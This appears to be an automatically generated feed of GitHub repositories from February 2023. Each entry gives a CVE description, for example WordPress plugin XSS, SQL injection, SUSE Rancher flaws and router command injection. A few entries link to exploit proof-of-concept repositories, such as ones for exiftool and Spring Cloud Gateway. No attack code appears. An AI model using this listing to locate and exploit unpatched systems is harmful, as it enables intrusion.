**A Improper Privilege Management vulnerability in SUSE Rancher, allows users with access to the escalate verb on PRTBs to escalate permissions for any -promoted resource in any cluster. This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43759](https://github.com/Live-Hack-CVE/CVE-2022-43759) create time: 2023-02-07T15:39:41Z

**A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in SUSE Rancher allows code execution for user with the ability to add an untrusted Helm catalog or modifying the URL configuration used to download KDM (only admin users by default) This issue affects: SUSE Ranch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43758](https://github.com/Live-Hack-CVE/CVE-2022-43758) create time: 2023-02-07T15:39:37Z

**A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows users on managed clusters to gain access to credentials. The impact depends on the credentials exposed This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43757](https://github.com/Live-Hack-CVE/CVE-2022-43757) create time: 2023-02-07T15:39:34Z

**A Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in SUSE Rancher allows remote attackers to cause denial of service by supplying specially crafted git credentials. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43756](https://github.com/Live-Hack-CVE/CVE-2022-43756) create time: 2023-02-07T15:39:30Z

**A Insufficient Entropy vulnerability in SUSE Rancher allows attackers that gained knowledge of the cattle-token to continue abusing this even after the token was renewed. This issue affects: SUSE Rancher Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43755](https://github.com/Live-Hack-CVE/CVE-2022-43755) create time: 2023-02-07T15:39:26Z

**A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in wrangler of SUSE Rancher allows remote attackers to inject commands in the underlying host via crafted commands passed to Wrangler. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31249](https://github.com/Live-Hack-CVE/CVE-2022-31249) create time: 2023-02-07T15:39:22Z

**A Missing Authorization vulnerability in of SUSE Rancher allows authenticated user to create an unauthorized shell pod and kubectl access in the local cluster This issue affects: SUSE Rancher Rancher versions prior to 2.5.17; Rancher versions prior to 2.6.10; Rancher versions prior to 2.7.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21953](https://github.com/Live-Hack-CVE/CVE-2022-21953) create time: 2023-02-07T15:39:18Z

**A vulnerability was found in SourceCodester Medical Certificate Generator App 1.0. It has been rated as critical. Affected by this issue is the function delete_record of the file function.php. The manipulation of the argument id leads to sql injection. VDB-220346 is the identifier assigned to this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0707](https://github.com/Live-Hack-CVE/CVE-2023-0707) create time: 2023-02-07T15:39:45Z

**Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior store passwords in a plaintext file when the device configuration is exported via Save/Restore–>Backup Settings, which could be read by any user accessing the file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22389](https://github.com/Live-Hack-CVE/CVE-2023-22389) create time: 2023-02-07T15:39:09Z

**Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior are vulnerable to a heap-based buffer overflow, which could allow an attacker to execute arbitrary code or crash the device remotely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23582](https://github.com/Live-Hack-CVE/CVE-2023-23582) create time: 2023-02-07T15:39:05Z

**no description** : [jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free](https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free) create time: 2023-02-07T15:33:41Z

**TOTOLINK-A702R-V1.0.0-B20161227.1023 Directory Indexing Vulnerability** : [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368) create time: 2023-02-07T15:12:27Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability** : [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733) create time: 2023-02-07T15:11:27Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session** : [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732) create time: 2023-02-07T15:10:21Z

**HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page Cross Site Scripting (XSS) Vulnerability** : [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311) create time: 2023-02-07T15:13:33Z

**An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in paste allows remote attackers to place Javascript into SVG files. This issue affects: openSUSE paste paste version b57b9f87e303a3db9465776e657378e96845493b and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21948](https://github.com/Live-Hack-CVE/CVE-2022-21948) create time: 2023-02-07T13:25:33Z

**A vulnerability was found in Custom-Content-Width 1.0. It has been declared as problematic. Affected by this vulnerability is the function override_content_width/register_settings of the file custom-content-width.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10075](https://github.com/Live-Hack-CVE/CVE-2015-10075) create time: 2023-02-07T13:25:29Z

**CVE-2022-23935 exploit PoC exiftool version 12.37 written in python** : [0xFTW/CVE-2022-23935](https://github.com/0xFTW/CVE-2022-23935) create time: 2023-02-07T13:02:40Z

**no description** : [amitlttwo/CVE-2021-22986](https://github.com/amitlttwo/CVE-2021-22986) create time: 2023-02-07T11:19:20Z

**A vulnerability was found in OpenSeaMap online_chart 1.2. It has been classified as problematic. Affected is the function init of the file index.php. The manipulation of the argument mtext leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version staging is able to address this i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10074](https://github.com/Live-Hack-CVE/CVE-2015-10074) create time: 2023-02-07T11:15:12Z

**no description** : [amitlttwo/CVE-2020-5902](https://github.com/amitlttwo/CVE-2020-5902) create time: 2023-02-07T11:07:23Z

**A Incorrect Default Permissions vulnerability in rmt-server-regsharing service of SUSE Linux Enterprise Server for SAP 15, SUSE Linux Enterprise Server for SAP 15-SP1, SUSE Manager Server 4.1; openSUSE Leap 15.3, openSUSE Leap 15.4 allows local attackers with access to the _rmt user to escalate to root. This issue affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31254](https://github.com/Live-Hack-CVE/CVE-2022-31254) create time: 2023-02-07T11:15:15Z

**Dell Command Intel vPro Out of Band, versions prior to 4.3.1, contain an Improper Authorization vulnerability. A locally authenticated malicious users could potentially exploit this vulnerability in order to write arbitrary files to the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23696](https://github.com/Live-Hack-CVE/CVE-2023-23696) create time: 2023-02-07T11:15:27Z

**An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in libzypp-plugin-appdata of SUSE Linux Enterprise Server for SAP 15-SP3; openSUSE Leap 15.4 allows attackers that can trick users to use specially crafted REPO_ALIAS, REPO_TYPE or REPO_METADATA_PATH settings to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22643](https://github.com/Live-Hack-CVE/CVE-2023-22643) create time: 2023-02-07T11:15:23Z

**A vulnerability, which was classified as critical, has been found in SourceCodester Medical Certificate Generator App 1.0. Affected by this issue is some unknown functionality of the file manage_record.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0706](https://github.com/Live-Hack-CVE/CVE-2023-0706) create time: 2023-02-07T11:15:19Z

**The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4552](https://github.com/Live-Hack-CVE/CVE-2022-4552) create time: 2023-02-07T06:48:14Z

**The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4553](https://github.com/Live-Hack-CVE/CVE-2022-4553) create time: 2023-02-07T06:48:11Z

**The CPO Companion WordPress plugin before 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4837](https://github.com/Live-Hack-CVE/CVE-2022-4837) create time: 2023-02-07T06:48:07Z

**The Chained Products WordPress plugin before 2.12.0 does not have authorisation and CSRF checks, as well as does not ensure that the option to be updated belong to the plugin, allowing unauthenticated attackers to set arbitrary options to 'no' CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4872](https://github.com/Live-Hack-CVE/CVE-2022-4872) create time: 2023-02-07T06:48:04Z

**An improper check for unusual conditions in Zyxel NWA110AX firmware verisons prior to 6.50(ABTG.0)C0, which could allow a LAN attacker to cause a temporary denial-of-service (DoS) by sending crafted VLAN frames if the MAC address of the vulnerable AP were intercepted by the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45854](https://github.com/Live-Hack-CVE/CVE-2022-45854) create time: 2023-02-07T06:47:49Z

**A cross-site scripting (XSS) vulnerability in Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.13)C0, which could allow an attacker to store malicious scripts in the Logs page of the GUI on a vulnerable device. A successful XSS attack could force an authenticated user to execute the stored malicious scripts and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45441](https://github.com/Live-Hack-CVE/CVE-2022-45441) create time: 2023-02-07T06:47:45Z

**A post-authentication command injection vulnerability in the CLI command of Zyxel ZyWALL/USG series firmware versions 4.20 through 4.72, VPN series firmware versions 4.30 through 5.32, USG FLEX series firmware versions 4.50 through 5.32, and ATP series firmware versions 4.32 through 5.32, which could allow an authentic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38547](https://github.com/Live-Hack-CVE/CVE-2022-38547) create time: 2023-02-07T06:47:42Z

**NVIDIA GeForce Experience contains a vulnerability in the installer, where a user installing the NVIDIA GeForce Experience software may inadvertently delete data from a linked location, which may lead to data tampering. An attacker does not have explicit control over the exploitation of this vulnerability, which requir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42291](https://github.com/Live-Hack-CVE/CVE-2022-42291) create time: 2023-02-07T06:47:31Z

**NVIDIA GeForce Experience contains an uncontrolled search path vulnerability in all its client installers, where an attacker with user level privileges may cause the installer to load an arbitrary DLL when the installer is launched. A successful exploit of this vulnerability could lead to escalation of privileges and c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31611](https://github.com/Live-Hack-CVE/CVE-2022-31611) create time: 2023-02-07T06:47:28Z

**Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions starting with 2.5.0-rc1 and above, prior to 2.5.8, and version 2.6.0-rc4, are vulnerable to an authorization bypass bug which allows a malicious Argo CD user to deploy Applications outside the configured allowed namespaces. Reconciled Ap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22736](https://github.com/Live-Hack-CVE/CVE-2023-22736) create time: 2023-02-07T06:48:25Z

**syft is a a CLI tool and Go library for generating a Software Bill of Materials (SBOM) from container images and filesystems. A password disclosure flaw was found in Syft versions v0.69.0 and v0.69.1. This flaw leaks the password stored in the SYFT_ATTEST_PASSWORD environment variable. The `SYFT_ATTEST_PASSWORD` enviro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24827](https://github.com/Live-Hack-CVE/CVE-2023-24827) create time: 2023-02-07T06:48:22Z

**PDFio is a C library for reading and writing PDF files. In versions prior to 1.1.0 a denial of service (DOS) vulnerability exists in the pdfio parser. Crafted pdf files can cause the program to run at 100% utilization and never terminate. The pdf which causes this crash found in testing is about 28kb in size and was di CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24808](https://github.com/Live-Hack-CVE/CVE-2023-24808) create time: 2023-02-07T06:48:18Z

**The WP Social Widget WordPress plugin before 2.2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0074](https://github.com/Live-Hack-CVE/CVE-2023-0074) create time: 2023-02-07T06:48:00Z

**The PDF Viewer WordPress plugin before 1.0.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0033](https://github.com/Live-Hack-CVE/CVE-2023-0033) create time: 2023-02-07T06:47:56Z

**The WP Tabs WordPress plugin before 2.1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0071](https://github.com/Live-Hack-CVE/CVE-2023-0071) create time: 2023-02-07T06:47:52Z

**BTicino Door Entry HOMETOUCH for iOS 1.4.2 was discovered to be missing an SSL certificate. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46496](https://github.com/Live-Hack-CVE/CVE-2022-46496) create time: 2023-02-07T02:17:00Z

**A flaw was found in libXpm. When processing a file with width of 0 and a very large height, some parser functions will be called repeatedly and can lead to an infinite loop, resulting in a Denial of Service in the application linked to the library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44617](https://github.com/Live-Hack-CVE/CVE-2022-44617) create time: 2023-02-07T02:16:57Z

**Because the web management interface for Unified Intents' Unified Remote solution does not itself require authentication, a remote, unauthenticated attacker can change or disable authentication requirements for the Unified Remote protocol, and leverage this now-unauthenticated access to run code of the attacker's choos CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3229](https://github.com/Live-Hack-CVE/CVE-2022-3229) create time: 2023-02-07T02:16:53Z

**Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28923](https://github.com/Live-Hack-CVE/CVE-2022-28923) create time: 2023-02-07T02:16:50Z

**CVE-2022-22947注入哥斯拉内存马** : [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947) create time: 2023-02-07T01:59:01Z

**Versions of Coverity Connect prior to 2022.12.0 are vulnerable to an unauthenticated Cross-Site Scripting vulnerability. Any web service hosted on the same sub domain can set a cookie for the whole subdomain which can be used to bypass other mitigations in place for malicious purposes. CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23849](https://github.com/Live-Hack-CVE/CVE-2023-23849) create time: 2023-02-07T02:17:07Z

**A memory leak flaw and potential divide by zero and Integer overflow was found in the Linux kernel V4L2 and vivid test code functionality. This issue occurs when a user triggers ioctls, such as VIDIOC_S_DV_TIMINGS ioctl. This could allow a local user to crash the system if vivid test code enabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0615](https://github.com/Live-Hack-CVE/CVE-2023-0615) create time: 2023-02-07T02:17:04Z

**In Boa, there is a possible escalation of privilege due to a stack buffer overflow. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31578](https://github.com/Live-Hack-CVE/CVE-2021-31578) create time: 2023-02-07T00:06:46Z

**In Boa, there is a possible escalation of privilege due to a missing permission check. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31577](https://github.com/Live-Hack-CVE/CVE-2021-31577) create time: 2023-02-07T00:06:42Z

**In Boa, there is a possible information disclosure due to a missing permission check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210008; Issue ID: OSBNB00123241. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31576](https://github.com/Live-Hack-CVE/CVE-2021-31576) create time: 2023-02-07T00:06:39Z

**In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31575](https://github.com/Live-Hack-CVE/CVE-2021-31575) create time: 2023-02-07T00:06:35Z

**In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31574](https://github.com/Live-Hack-CVE/CVE-2021-31574) create time: 2023-02-07T00:06:32Z

**In Config Manager, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege from a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20210009; Issue ID: OSBNB00123234. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31573](https://github.com/Live-Hack-CVE/CVE-2021-31573) create time: 2023-02-07T00:06:28Z

**The Bold Timeline Lite WordPress plugin before 1.1.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4828](https://github.com/Live-Hack-CVE/CVE-2022-4828) create time: 2023-02-07T00:07:05Z

**The CPT Bootstrap Carousel WordPress plugin through 1.12 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4834](https://github.com/Live-Hack-CVE/CVE-2022-4834) create time: 2023-02-07T00:07:01Z

**The Social Sharing Toolkit WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4835](https://github.com/Live-Hack-CVE/CVE-2022-4835) create time: 2023-02-07T00:06:56Z

**An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48166](https://github.com/Live-Hack-CVE/CVE-2022-48166) create time: 2023-02-07T00:06:49Z

**The WP Extended Search WordPress plugin before 2.1.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4649](https://github.com/Live-Hack-CVE/CVE-2022-4649) create time: 2023-02-07T00:06:25Z

**The Pricing Tables WordPress Plugin WordPress plugin before 3.2.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4654](https://github.com/Live-Hack-CVE/CVE-2022-4654) create time: 2023-02-07T00:06:20Z

**The Posts List Designer by Category WordPress plugin before 3.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4749](https://github.com/Live-Hack-CVE/CVE-2022-4749) create time: 2023-02-07T00:06:11Z

**The Portfolio for Elementor WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4765](https://github.com/Live-Hack-CVE/CVE-2022-4765) create time: 2023-02-07T00:06:08Z

**Themify Shortcodes WordPress plugin before 2.0.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4787](https://github.com/Live-Hack-CVE/CVE-2022-4787) create time: 2023-02-07T00:06:03Z

**The Accordion Shortcodes WordPress plugin through 2.4.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4781](https://github.com/Live-Hack-CVE/CVE-2022-4781) create time: 2023-02-07T00:05:59Z

**There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23333](https://github.com/Live-Hack-CVE/CVE-2023-23333) create time: 2023-02-07T00:06:53Z

**A vulnerability, which was classified as problematic, has been found in WangGuard Plugin 1.8.0. Affected by this issue is the function wangguard_users_info of the file wangguard-user-info.php of the component WGG User List Handler. The manipulation of the argument userIP leads to cross site scripting. The attack may be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20177](https://github.com/Live-Hack-CVE/CVE-2017-20177) create time: 2023-02-06T21:52:04Z

**The Post Category Image With Grid and Slider WordPress plugin before 1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high priv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4747](https://github.com/Live-Hack-CVE/CVE-2022-4747) create time: 2023-02-06T21:52:53Z

**The Strong Testimonials WordPress plugin before 3.0.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4717](https://github.com/Live-Hack-CVE/CVE-2022-4717) create time: 2023-02-06T21:52:49Z

**The Hide My WP WordPress plugin before 6.2.9 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4681](https://github.com/Live-Hack-CVE/CVE-2022-4681) create time: 2023-02-06T21:52:46Z

**The Leaflet Maps Marker WordPress plugin before 3.12.7 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4677](https://github.com/Live-Hack-CVE/CVE-2022-4677) create time: 2023-02-06T21:52:42Z

**The Ibtana WordPress plugin before 1.1.8.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4674](https://github.com/Live-Hack-CVE/CVE-2022-4674) create time: 2023-02-06T21:52:38Z

**The PDF.js Viewer WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4670](https://github.com/Live-Hack-CVE/CVE-2022-4670) create time: 2023-02-06T21:52:35Z

**The Logo Slider WordPress plugin before 3.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4664](https://github.com/Live-Hack-CVE/CVE-2022-4664) create time: 2023-02-06T21:52:31Z

**The Easy Testimonials WordPress plugin before 3.9.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4577](https://github.com/Live-Hack-CVE/CVE-2022-4577) create time: 2023-02-06T21:52:27Z

**The HUSKY WordPress plugin before 1.3.2 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4489](https://github.com/Live-Hack-CVE/CVE-2022-4489) create time: 2023-02-06T21:52:23Z

**The WP Show Posts WordPress plugin before 1.1.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4459](https://github.com/Live-Hack-CVE/CVE-2022-4459) create time: 2023-02-06T21:52:20Z

**The Stream WordPress plugin before 3.9.2 does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4384](https://github.com/Live-Hack-CVE/CVE-2022-4384) create time: 2023-02-06T21:52:16Z

**In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705028; Issue ID: GN20220705028. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32655](https://github.com/Live-Hack-CVE/CVE-2022-32655) create time: 2023-02-06T21:52:12Z

**In ccd, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07341261; Issue ID: ALPS07341261. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32643](https://github.com/Live-Hack-CVE/CVE-2022-32643) create time: 2023-02-06T21:52:07Z

**The Restaurant Menu WordPress plugin before 2.3.6 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4657](https://github.com/Live-Hack-CVE/CVE-2022-4657) create time: 2023-02-06T21:51:38Z

**The PPWP WordPress plugin before 1.8.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4626](https://github.com/Live-Hack-CVE/CVE-2022-4626) create time: 2023-02-06T21:51:35Z

**In Wi-Fi driver, there is a possible system crash due to null pointer dereference. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220720014; Issue ID: GN20220720014. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32663](https://github.com/Live-Hack-CVE/CVE-2022-32663) create time: 2023-02-06T21:51:31Z

**The Contextual Related Posts WordPress plugin before 3.3.1 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0252](https://github.com/Live-Hack-CVE/CVE-2023-0252) create time: 2023-02-06T21:52:00Z

**The SiteGround Security WordPress plugin before 1.3.1 does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0234](https://github.com/Live-Hack-CVE/CVE-2023-0234) create time: 2023-02-06T21:51:56Z

**The Html5 Audio Player WordPress plugin before 2.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0170](https://github.com/Live-Hack-CVE/CVE-2023-0170) create time: 2023-02-06T21:51:53Z

**The WordPrezi WordPress plugin through 0.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0149](https://github.com/Live-Hack-CVE/CVE-2023-0149) create time: 2023-02-06T21:51:49Z

**The Gallery Factory Lite WordPress plugin through 2.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0148](https://github.com/Live-Hack-CVE/CVE-2023-0148) create time: 2023-02-06T21:51:46Z

**The WC Vendors Marketplace WordPress plugin before 2.4.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0072](https://github.com/Live-Hack-CVE/CVE-2023-0072) create time: 2023-02-06T21:51:42Z

